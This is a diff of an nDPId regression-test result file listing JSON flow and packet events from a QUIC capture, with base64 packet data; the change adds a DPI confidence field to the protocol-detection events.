 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1621433323690,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433323690,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+3xAAH4RF4uokEAFcfqJ894MAbsFTp8Fzf8AAB0IvzqNQD0lRtMANwAyYa5fSLdWImB4ZVjTL2NEPya1cUtwCyStcfOGkb+i0HvP10Xnx2V6173CCBLyTlS2lW3ItThE\/V6vYeQp5d8+\/LNRUHhhok6SCvxveMOhomdOJpo8G34ZKxbpZZeGXMm+kxymEvh9PGGn4vHBB6v4SwzcoQL4QdYO+oYbe4NJGodI+SmHvMckm12krbWK18PtHzoYrJftqnunvJo9ULpSRaYu2+s6djIY3q7wuNnjJvZDUe5LF2t9pFC+gvIh2yTEiqiPxPThsUMHIGShrjOrLAxZrFkrJHPByKb8fTvaZlj+Dkpvl20jckd+I0vvUZV\/2XJXbyUBPGy2tkcDameP4Y5wVjdpq6TVih2KnVLphaiRQHJibXu58TyDz0Vd9X6glZg4tYEC2iKCYEy5kUqjvrjHuGphHab1PzL06uyyN+x\/732GK6ik4JUpWyZBztoY9G7fyAAxwg6UPj487al0tVnMwp1c37Z3vKYougGLf+uVEsTYDF7Cpqu+Ea7zDIydQx7IO8f0CUfPQi\/u8\/gD4HXXAdB2qA1yUY\/VlHUe3+mmQbrEIgq8uIdDQWKYbjVC5pvQNUhxoD\/aL0ONFl\/jOVpgaM\/zL2\/ko1dyUaMhLjojLbYyekvliZ3qkxk605uj5nYxD\/OY0t4miGDxZQMnUULowLp7cbjsKiCD\/BjS+2cK+geBlIFH1XYvpAgJYFqu5\/05GxQPEqo2AZuX650wvMXpjzo7oLSb3VQ3LP6jN+3GtZQkbqO0Ml2eFlFThBeHZyyNfdgISKQXW66VXUuuUPhduLb3p5Yeuex9h\/2xxRpZf+QwTlcaySd6XeQxuyDRaiHCM6HiKDMj8VSuGyQ6y6G\/CQ2lQpqTq0JCG\/TihEgoblpCMhxGu52dI8\/M4cE6+j2XEdE4krEK2jiEaIZKGdebeUzB9JAU0IEQ368+526\/BhOh0rEXo9RUgNgTnXonlH1MQUqO1fcoXxn08UG5E6ZYKgu\/OZN1pWGWjVSWyMfCT4BqFy0DQnEk0oVfz682lYFVubZ2QMzip7UVNkMKKCepikphE4c7ppd3hkLM9bsNAktobkOkAgW2i++QQX\/bTNfJxawx6s88fmfdgIdLdYyVTIeI78VHXkUVfbHcjoQFDDnKH\/5gdBE+P5BLF4EpLHfAF4Wx974YrGRnZHnoMF43ssv3SEdPlN2iriNrn4spM4xowNSQZcUmJHTcSpU+Uat4MDUM6V4RHks5OewDlWO4kOK+6LIYgpiR+yBKe\/LrPhXG4P4O0gNUot5Mb1kSEjLXUEj\/1PtJIrIb4oS70D8+c1NIiu\/OQVFn5lEPax5\/uGndd3bG0u6aRIwsYEkaTKTgdt2ZQun3oPeubolQM1fI1tzSovLzWnNl+koBh7dhxXhgQ\/X9UAn1n9hyc5f5taxal62r3tci4Mbbx8KPZBkYFj8Mmrqc8KDSHzLCloQSWCQSCkBQZ9FMuVsXUYmlB3jRDOW7KZN2uY8kbzPbIbjPWcCvUdxdHVNDIlPdgQ\/XLcgXkYVqmy7m9JKpfEvarWH5dSTcvvBS\/j7hMNXbKyu2ZBJX6gfqjxLKsxKQggL6gi+eWunxMe\/1Z3CwjGLDysODiQjylrqRc\/i89KaJ4RMPmIB9Ni0qJzV1nr4XAGc8l7QrTQ6KvRGv+KgMs0SAAvvCG8jxH07B459x95jC8vicEuCu4Qa8+k5\/C+g6l70JY75v1dmSj7TKtkEeixX9hXhrRxZTs9Uf4IcI+X23icYMl1eKUVDfGr5SG09huGxWXyIx"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1621433390651,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433390651,"pkt":"AAAAAAAAAAEAU0VlCABFAAViM7pAAH4RJYuokEAFmWIcTuQuAbsFTrRvzv8AAB0INosFT237+MMANwBb9TwbasdQ32A5cX94fXk3R40z4mY0PhE1HEAJQYO4V6\/3tF0P2M88fsUndGz9Fr7kJKq5dvhE\/XERoYXV5NHZLSYf4DTWVhp7q1z6KYJRQxo75jUpfdEwUa6ZG+5bNu\/A5u9XKnFMFC0KCN5TT4NsPs0VPSqpEv80Khbgf8\/cxxTXZWjqluHOImCUv2NFZIJpo9CgaD0e+8GRtcXDohjn+znKXGpEH1V8b\/3kSK48z6I+6n3KVBV2xHgdOGQwwEd1q1J+ECF5KYSp9RUL0zzTscSavIziA0pSN7JIWZUep\/Ok1sLxp9ATB3LHSyV9ajz0afQRqz8lPxBfGq9y5R3BFba3C9vH70pf4yBTyQd6jqWvZyTR21R\/xl6xRf4gAhvJcYjJkxW+3lmGOhS68JXB7SBW\/j\/51vJYllmwAccGUXQGTXS5\/VWIw5VScjbKe0pa3A8a9e8Av\/ljOB\/HEfVTnsj+Y+qchpc8HO4XTQoFrPwaU8vXQ1JM66P7sQb1sco0zqaDzmitGZlUT1QWpnQr7eKksiSn9NnvNYTUvdDSSPn3PKsb2RhC9OqgtoYPKkGHpW8FvVwHYqbSyvaU3MJxUBlxuA0FvYBKTVbWO0AgmyZocUfOLKTsk\/TZfqoCD3QW7FO7lNRUo+P1rP9gFOB463DdLyAUsjehCczhWZWdGU\/gT04HidAXsnw6jARYjLJBcLpd08Td0XXQY6albr3J8ZZ9LOvShd71AaKUK4b3zzE1WCv8qtmiARodSJhVf6dZMl+yNOLSPKMomawxSMzPdml\/FM\/zeE6Dlz+9BPCv+f08v5Fn9tMUAsDXRUKY+8WZNa7DgQzfNejuemuadnwoPLOzzh2w6xM0Rzp6OEuIpQFyQW5xNjLrzOOpMaJIzF2sqpzwfuKJCm3s1snEjO84ddDhgxqjSj4lavW+riy8zgmEWo47r2DqOd3WghFxjV8xyvlVX1uHWa05pzMGWfGeumcPVMyT0adU5+wJkEcRvHBRw+oHJsqaukZHSI5JJYAbZf1ESnjxhCqHtgklzs9ImmCW7GeF21uZglW+vjLUsQcwNpF8zy37gmZdX4j9TzC1fY1ZjbAZMCcZltyE4Ua\/HE9Gr4qIttYQRoSXvemLO35Ifzyp3YBJuix7D\/0G7UY96\/ygRaDjJYKdA8flhrjpLc01yADTlcnXVTVLb1A6zKUqy1IoG\/Tlk\/z3cQ9+IaG0ETvoH+URSO+Wy5\/31GgH86Fb91IlFWvBBgEg9o5mtJE4ZjuQeHoeCfnmV53e5D0s6e1mLoSTRslkgBkyPIHBkD+AfULG9yRcBDRHLVOUtHMauEJx5SFk6LDE48gvZ\/W14DPXuSshpkqThd+a9l965NCkiqLzobezcZyu8ONMCL4aWAP4JD6b0Xp08jXqOcZYqiJ7NZSbad15kseZHdYQvvA+PJhUbcE5YZWcn\/xOb806apm1GAxXDo9cx3POklhJ0tzP\/LMU\/8cl+t2ZxNjURhO8nGFdQRgkvW6BDfHMzQeR6PbeH3pEswauHhyM5fr7Wk49wwwktzukldwFbMPCg9p87hqBsGVxIND1WlwqOlV\/lxMTiW\/q4zZTP6jyb8htKoyq380p91mZyV0+Qdr+Qa7+\/NlUYv8PEee2yAJ5phlblYmFxIh\/JvKbTy5doeGxfVsMIJdICKa5u7\/SlsDHJCHaQdFlIVGoLAQ1H8FpK6Y\/P56TfHflnO\/ivZWYw6MQJh9riQHgPJbhr65Ah4Btxq8WeMahT6b7GzECoVCR8QqXUp3Q"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1621433411827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433411827,"pkt":"AAAAAAAAAAEASYHhCABFAAVixWVAAH4RXjKokEAFEOjade+dAbsFTkGKyP8AAB0ID6UbviYe1OcAAEU0lEpFVo61ttZD0\/Guo\/jnAnR9jv+k5pAvfeBeOWD6Cm8zeiN4ecxHXQbeJAslmDKkgnaApPPGNJshgoi7VzHr\/rv4f991MIah9Z0x3iwrLSqHm+jIfLQxfiAPFuB9rLMf4f5yjsUpTl7yYpryWfDoVmV2zU2awpg5MyVbMiWeuULv\/hrjEOVgd6zoPwwK5dF1RV\/wrIcyIIMUpE+r5n8s58GUzUdN3AhPEbNnKhRwC6RWrqA+i0cqa8ctZWlgocKvytYgiqCsqMVO3NdyZSTFiTuNzFYJLpfFCUzIPf63hLzpNqbjK63qqYHIxdtHDARFoPxNzOgrVier\/q2WjzxC+M6mQi+H2pqwgvmMAlvMEtDd1ZlAWkzOl4G\/oReq\/ToNk7RekeRqvxLV\/VeSMXbYuQGNbpu2wr1Wxl6BibYf\/79Z3rObQtiyM19RxMxp7mdvUcLeIhqREsWiAfd+i1zPeTFCw+TQxI+c7b8r8\/XfC6A0KPfbtIIopv4Md8ZWbT8evvkG1J7aQcX8LESarYbxGnYGbIKbRvieAyXupa9DNkt5ydiaOWNMWmnYatZS7q+vJrXn89FucDVT03eSB8\/l5O5rpocuX6dFZiCeqampgTCdr3kOlnlcPHHqJr+VaFY4vr5Xyh5EHsikjEWIGozPdc7jEZtWf3uYTyNQsjZBZgpnS7YJW7nOT2DjNWT0GWwr0Ic1PXuo8I2w5qSUux7ny0enp7B\/26GObK7DIsMjzFG8UHaQBBmT\/Gf6mdO5kccDPkmAWHe0oXsNPt7\/TmoB8HTzqmFM3q5jiptukUvnl6h3hrA4tDcWF6r6\/VaXFDgQChkQm\/m5WrQEKH+KSIIwCREIKBUb3xaKQEJM4DmC+PDjOpNX2TtmlEUfuimAq0RFbxofd+ZiNjHaNh9WW79+yMMNubGxcKaeiIUpxvvl+n8zGFM11cyoFugluYbAi8iHUHh3Cjjf9i8p\/JBp8Lwsqt8GOKWBoZr8Pv9Qwx\/yhIn9+hyt75NZceSkQPB2HilwbRmKH9ZWN1RLraLSCDjLFZUoXLSdJR3\/RNAs+0evfZVDyjhtDb9Eybgu7J\/eCdLlS3X6ZW+L84u+0SQDGVf6Ood3an8Co1tUKtWj0PhIkidMAwm1PT4EdcGZ0Og4+2sY64xmsHSK3dYm3M1QvEAwoRAl7F2yqmYCv7brxvtZjAJQRQ+SvKtUx9c5gyIckMAAQPNHHrAiKGz7YZtDQNhcaxQR3kHPlUSzEMcAKMY1RR7CN\/pSeooHbHeCdnLpRnly2OT\/HcsGFzOvorJJhV2IGzqc5eU85yleqWqGU4sEQpVrPVOXIbwh\/xWWQ3840ZM2zRH5KGNip5J0esfDT3r1uD4+AX0TrvlQvBmkVKYVu8\/Dc9JFMO8ks11koiARJyBa1p\/sYHKBx1429RrmPqPI1XGKrymUtfQLC1CjqDyMOcxMqXqHjOsV2W9Oe3aLqW0jqS4duUkIT45+NWUAEWQ5dcCvojudybcgB4i60UXLIJevToJ3JBxhaiZ0CBRlMiKqo7D27zgr1XJAjPS+feRSz+BJmxsqmY7bE7m7oRlxsN1qe0wj+Y+9szslqshgyS2A5FJDMEnvbShUgke31IlErYOEjA3M5ysDeUu5PO3ZaH7U9PkLACney3E6ldmC+Nm2iaW6IcjlkqsHCdTehMCOgQeKjiT8gNfoQUi0sDE1nb57Dfx6ucdbSEHW6ULrwjrSydeaPhk7\/b\/ZyzdR5QbL\/8bpPlib01D2Ts9qawYdi2FBumvw"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1621433443702,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621433443702,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+6RAAH4RF2OokEAFcfqJ891rAbsFTomjw\/8AAB0IUmuY6nOze38ANwCN5aNI0Jhzv9NOMh\/1sz8Pq4SZBhXzrMMmdjZzrQgjx1zkkutKHQB1oDFT8L80Z4Aw8jSNx3hE\/Zw\/laqqIbhk2h4AYI8E2Ksg3Sfl+5RD5Qe9ekCyVbSOIn\/RQGKQ+Ysrz4swQWQlQaC+KtSVXMe3vllDuG\/jjZv8zSYZWp4V2dx8qPMZPOw3vPgkM\/WcagE5PucdMP+3itniSXOFzVDdgXKq5nmt+7yYD1XqERMNH7mUp+JRrWe4XHV7cKX02FgoGRmWOpxUJWFf7LJEmXiGcbi7Y0jE\/h\/OYXsowiB1squTTDTuQqDqWuYNEAOZV9SOZp2L7pqHnGTE9iJVdZW+JFE20DbZCic3DVlzGwLNvFMykQy2R19YE9TfCuZrbfxU0FPlLGpo5fIWWWvDAVoqbqVmZqEGwcTHzgV8Yz9EUd9TKsk+pq6On9FaEMp9uqGWWwnxo3eZj0TPa3FIym2Jcz1rAVeaoddUuSsIGRkpmLUnVQPtQlzkUneg+9hSBIQzKf0B4JD4gK60cQ+wEib\/Mlb2svj8AwuMbD42dbbUAldY8vdc2R6SBT7hjpHRBMRK\/23CtpazJepPZW9TaqY1KH0Tz\/rdqetAkIpplEYk8d\/g9AITDWSrF8e6zya2TMq79ase5qJDl1I7B2BaCwE6uBrcM3YNywAaodudS6yBo7OBmzBJLhjcpawpG1VBepprPrMyQKdKRaLIppfRPMpB1zNwIz1B\/b0n29UJhF6mBe0rd\/G89yqhkXZrgizvDrWltB8tOP9SBV2j6Lu0+wAsCdQXImvD3VUPci4NZs5GU7Vvk\/ru8p8qVRhy1G9PMoV9S29kH3cyerovTX6XCRqhXT7LjRT227GeRmtu3e6LKmxiCSV16aoE86qsn7s15ede43yipjlcC2hBClsbMTb2sd2VPU5sjNA7FNWxGPJemWAv1BZza5EgN49CYT43mq\/jV+DKvYykpvXjR7AtKXJDZ6Sjxau21\/2SoAW9fknYkCMN\/b6sBb\/fb2UpjRQ7vtJeLKXxg6xRmaSy02gAXGTje9zcd4wsNhHKa5efII9Ck1SaDqkDwzSlV1MgZYsboWuDhaRPboyD3HUhtACz7J+Y3TYKG8hOhjZ4ZCZgGjHzNSe75OGW465v+X67ja\/0mNh37VVVzJ8W2qxkDcAd6QHJT+qyXR64+O7B10B7DO9voZAqB4B7NmlTjFKRebbQu57q54zPuFHoi5ShAmQQ9UaPbGtA3CwzY355cHS0TvLRROOxD2CS17paHw+jZFFnHn5LXH6snBlWaDVhRzqR\/YYGoi4d\/7LIG+yhTFvXfp4vXRdxfwTSW\/47XWHABPYfJ6vXmF0ZlSVMGkkiLOES0NuVRKMFyi4Xev+x7I5SlwVCu+Rvq8DSRF1MfjOJeMPXW0T\/Ekz0FDO4mP35HA\/3PeK18zuOlO37CdOsUXKnqLocCevQv9jz5q7vVxas6jE8BkD4uQY8aeyRiiKzeZh2\/lVon6R7IS4sMXdz1t4wPZr1ILCy8wM7LjPHggzpJxmfuu9E7qlOH406tiQeyFo7FY1H2GOapGdOKVftFin6pO7IjV88AyDx+yPUwuSKzmoqNi6P6VAErvOi4bRjw\/kYQg9LGmC02XKMWGdyW3mVcI\/8x\/3TkI4csH2+tr+BfT74D5aoqvH+ZJSLn0rurteuEBkZW2fndLeNUkyWzU015vCQoZJqvTClWmVcG9CLZn2rbyhXrUHNKkVJ+wn4ARFcIHQUVc7egurai3mUfPedLQU\/iDA4\/fPb"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -244,65 +244,65 @@
 00628{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
